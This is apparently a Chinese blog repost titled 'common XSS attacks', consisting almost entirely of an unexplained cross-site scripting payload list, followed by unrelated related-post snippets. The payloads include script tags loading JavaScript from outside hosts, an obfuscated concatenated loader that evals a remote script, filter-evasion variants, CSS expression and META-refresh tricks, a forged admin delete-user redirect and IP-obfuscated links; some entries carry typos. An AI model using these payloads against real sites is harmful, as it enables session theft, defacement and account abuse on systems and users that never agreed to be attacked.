2. 程式人生 > >Web安全(一):常見的XSS攻擊

Web安全(一):常見的XSS攻擊

阿新 發佈:2018-11-10 
<SCRIPT SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=jaVaScRipt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&$##54SA$&&%ASA356....>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')">

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<scipt'</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//</SCRIPT>
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<iframe scr=http://3w.org/XSS/html<
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT SRC="javascript:alert('XSS')">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<LINE REL="stylesheet" HREF="javascript:alert('XSS');">
<LINE REL="stylesheet" HREF="http://3w.org/xss.css">
<STYLE>li {list-style-image:url("javascript:alert('XSS')");}</STYELE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
http://www.tools.net/viewthread.php?actoin=printable&tid = 152673/6
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image:url(javascript:alert('XSS'))">
<DIV STYLE="width: expression_r(alert('XSS'));">
<IMG STYLE="xss: expression_r(alert('XSS'))">
<XSS STYLE="xss: expression_r(alert('XSS'))">
<STYLE>XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE></SYTLE>
type="text/css">BODY{background:url="javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<IMG SRC=http://www.XXX.com/a.php?a=b">
Redirect 302 /a.jpg http://www.XX.com/admin.asp&deleteuser
<SCRIPT a=">" SRC="http://2w.org/xss.js"></SCRIPT>
<A HREF="http://127.0.0.1/">XSS</A>
<A HREF="http://3w.org">XSS</A>
<A HREF="http://3232235521">XSS</A>
<A HREF="http://0300.0250.0000.0001">XSS</A>
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
<A HREF="http://www.google.com">XSS</A>
<A HREF="javascript:document.location='http://www.google.com'">XSS</A>

 

相關推薦

Web安全常見XSS攻擊

<SCRIPT SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT> <IMG SRC=javascript:alert('XSS')> <IMG SRC=jaVaScRipt:alert('XSS')> <I

編寫python web框架簡介

== web 方法 nvi ever pytho 必須 ext sim 編寫一個最簡單的應用: def app(environ, start_response): start_response(‘200 OK‘, [(‘Content-Type‘, ‘tex

步步搭建一個完整的web專案基本框架的搭建

資料看的再多,不如自己手動操作一遍。這裡我吧框架搭建的步驟羅列出來,只要跟著步驟走,就能實現一個web框架的搭建。本篇的任務:基本框架的搭建,並實現註冊登入功能。準備工作:1、開發環境的準備    詳細步驟不寫出來了,非常簡單,我把我的開發環境列出來。    2、jar包準備

Keepalived+Nginx+Tomcat搭建高可用的Web服務主備模式

前言 Nginx和Apache都可以用來作為反向代理伺服器,來提供負載均衡的能力,使我們的web伺服器,能夠水平擴容,從而處理更多的使用者請求,但是反向代理伺服器又變成了一個單點,當反向代理伺服器掛了,整合Web伺服器就不能被外界訪問到,所以我們必須要保證反向

機器學習總結常見的損失函式

這是博主的第一篇部落格,mark一下,希望今後能夠堅持下去。 博主是機器學習菜鳥,將來希望從事機器學習的工作,最近在整理機器學習的知識點,將這些總結的文字以部落格的形式展現出來,一是便於複習,二是分享出來希望能對別人會有一點點幫助。 最近蒐集了一些機器學習常

web安全系列XSS 攻擊基礎及原理

跨站指令碼攻擊(XSS)是客戶端指令碼安全的頭號大敵。本文章深入探討 XSS 攻擊原理,下一章(XSS 攻擊進階)將深入討論 XSS 進階攻擊方式。 本系列將持續更新。 XSS 簡介 XSS(Cross Site Script),全稱跨站指令碼攻擊,為了與 CSS(Cascading Style Sheet)

前端安全系列如何防止XSS攻擊

前端安全 隨著網際網路的高速發展,資訊保安問題已經成為企業最為關注的焦點之一,而前端又是引發企業安全問題的高危據點。在移動網際網路時代,前端人員除了傳統的 XSS、CSRF 等安全問題之外,又時常遭遇網路劫持、非法呼叫 Hybrid API 等新型安全問題。當然

WEB API系列WEB API的適用場景、第一個實例

區分 ltr 支持 new 序列 第一個 icontrol ada efault 在我前一篇博客中已經給各位簡單介紹了HTTP協議與RestFul API的關系,以及一些基本的HTTP協議知識,在這些知識的鋪墊下,今天,我們一起來討論一下WEB API的適用場

安卓介面基礎知識總結LinearLayout佈局的常見屬性

之前做專案都是用到了才會查詢自己所需的,沒有系統總結一下,也沒有特意去記,面試的時候被問到了居然不知道,-_-|| 決定開始系統總結一下: 1. android:orientation:設定線性佈局是水平還是豎直排列,可能選項如下: 1)vertical,豎直 2)horizontal,水

nodejs web應用伺服器搭建跑起你的伺服器

前言 本章會分四部分來講,在開始教程之前請準備好相關基礎知識 & 文件 JavaScript基礎;AMD概念;ES5 | ES6語法;(這些沒弄清楚估計往下看也看不下去) nodejs 環境搭建 nodejs sdk文件 express 使用方法

Javaweb學習筆記Servlet常見問題

1. 在server.xml中設定context路徑,如果Path值為“”,則可以訪問自己的頁面,無法訪問Tomcat主頁 2. 同樣的context路徑,path為空,卻啟動toncat失敗     解決:原因是有兩個相同的path路徑,空字元算相同的路徑 path=“”

javaweb學習筆記web入門簡介、tomcat

目錄 1.web入門 2.tomcat 2.1 Tomcat的安裝與使用 2.2 Tomcat的目錄結構 2.3 Web應用的目錄結構 1.web入門 B/S (Broswer -Server 瀏覽器端- 伺服器端)架構,其典型應用就是各種網站。它的特點是第一,不

學習筆記使用K近鄰演算法檢測web異常操作

黑客入侵Web伺服器後,通常會通過系統漏洞進一步提權,獲得ROOT許可權。我們可以通過蒐集LINUX伺服器的bash操作日誌,通過訓練識別出特定使用者的操作習慣,然後進一步識別出異常操作的行為。 1.資料蒐集        訓練集包括50個使用者的操作

python網路爬蟲web spider系統化整理總結入門

接觸爬蟲很久了,一直沒有個系統的理解和整理,近來假日無事,總結一下。 -------------------------------------------以下是目錄--------------------------------------------------------- 一、爬蟲概

web安全1-- XSS跨站指令碼攻擊

XSS攻擊,通常指黑客通過“html注入” 篡改了網頁,插入了惡意的指令碼,從而在使用者瀏覽網頁的時候,控制使用者瀏覽器的一種攻擊。其原理是攻擊者向有XSS漏洞的網站中輸入(傳入)一段惡意的HTML程式碼,當其它使用者瀏覽該網站時,這段HTML程式碼會自動執行,從而達到攻擊的目的。如,盜取使用者Co

原型鏈與繼承六種常見繼承模式

一、原型鏈繼承: function SuperType(){ this.colors = ["red", "blue", "green"]; } SuperType.prototype.Fun = function(){ }; function SubType(){ } //

SpringBoot簡明教程之Web檢視層WebJars及靜態資源對映規則

SpringBoot簡明教程之檢視層(一):靜態資源對映規則及WebJars的使用 文章目錄 SpringBoot簡明教程之檢視層(一):靜態資源對映規則及WebJars的使用 專案建立 靜態資源對映規則 靜態資源對映

電子商城後臺系統使用eclipse構建web專案

使用eclipse構建web專案,需要有eclipse和tomcat,兩者的安裝也非常的簡單,解壓就可以了,我這裡使用的tomcat是7.0版本的。解壓之後,目錄是這樣的 進入到bin目錄,雙擊startup.bat,啟動tomcat,當然,前提是安裝了jdk。 控制檯出現這樣的

Web學習筆記HTTP請求

HTTP請求流程 手頭有本《Web安全深度剖析》,感覺很裝逼,就看了看。 客戶端傳送Request請求,服務端返回Response請求 客戶端一般就是我們用的瀏覽器,服務端一般是高效能的計算機(組),比如www.baidu.com就代表一個伺服器的地址,即域名

Web 前端知識HTML

    頭部分:用來放置一些頁面資訊     體部分:用來放置一些頁面內容 <font size="1" color="red"> </font> <b>:加粗 <i>:斜體 <strong>:加粗,